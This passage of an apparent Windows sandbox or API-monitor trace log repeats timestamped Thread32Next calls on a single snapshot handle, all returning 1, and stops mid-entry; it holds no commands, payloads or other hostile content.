[0219.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.235] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.235] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.236] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0219.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0220.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.083] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.084] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.085] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.086] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.087] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.088] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.089] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.090] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.091] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.092] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.093] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.094] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.095] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.358] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.359] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.360] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.361] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.362] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.363] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.364] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.365] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.366] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.381] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0221.732] Thread32Next (hSnapshot=0x17c, 